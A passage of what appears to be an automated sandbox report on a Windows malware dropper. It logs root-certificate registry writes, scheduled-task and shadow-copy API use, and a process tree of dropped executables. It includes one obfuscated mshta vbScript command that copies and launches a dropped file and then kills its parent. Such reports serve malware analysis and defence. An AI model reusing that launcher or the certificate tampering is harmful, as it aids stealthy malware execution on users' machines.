61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0400000001000000100000001bfe69d191b71933a372a80fe155e5b50f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e190000000100000010000000ea6089055218053dd01e37e1d806eedf2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 040000000100000010000000e94fb54871208c00df70f708ac47085b0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b81900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b4200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 5c0000000100000004000000001000001900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c040000000100000010000000e94fb54871208c00df70f708ac47085b200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b8200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 5c000000010000000400000000100000190000000100000010000000ea6089055218053dd01e37e1d806eedf0300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd9796254830400000001000000100000001bfe69d191b71933a372a80fe155e5b52000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe"
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe
"C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
C:\Users\Admin\AppData\Local\Temp\inst001.exe
"C:\Users\Admin\AppData\Local\Temp\inst001.exe"
C:\Users\Admin\AppData\Local\Temp\install.exe
"C:\Users\Admin\AppData\Local\Temp\install.exe"
C:\Users\Admin\AppData\Local\Temp\mZkzkgccxHSnguzkDO\QTborv
C:\Users\Admin\AppData\Local\Temp\mZkzkgccxHSnguzkDO\QTborv
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Local\Temp\7.exe
"C:\Users\Admin\AppData\Local\Temp\7.exe"
C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe
"C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"
C:\Users\Admin\AppData\Local\Temp\setup_2.exe
"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
C:\Users\Admin\AppData\Local\Temp\is-RVTDF.tmp\setup_2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-RVTDF.tmp\setup_2.tmp" /SL5="$90112,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
C:\Users\Admin\AppData\Local\Temp\lijun-game.exe
"C:\Users\Admin\AppData\Local\Temp\lijun-game.exe"
C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
"C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe"
C:\Users\Admin\AppData\Local\Temp\setup_2.exe
"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4348 -ip 4348
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1860 -ip 1860
C:\Users\Admin\AppData\Local\Temp\is-7938F.tmp\setup_2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7938F.tmp\setup_2.tmp" /SL5="$90252,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
C:\Windows\SysWOW64\WerFault.exe
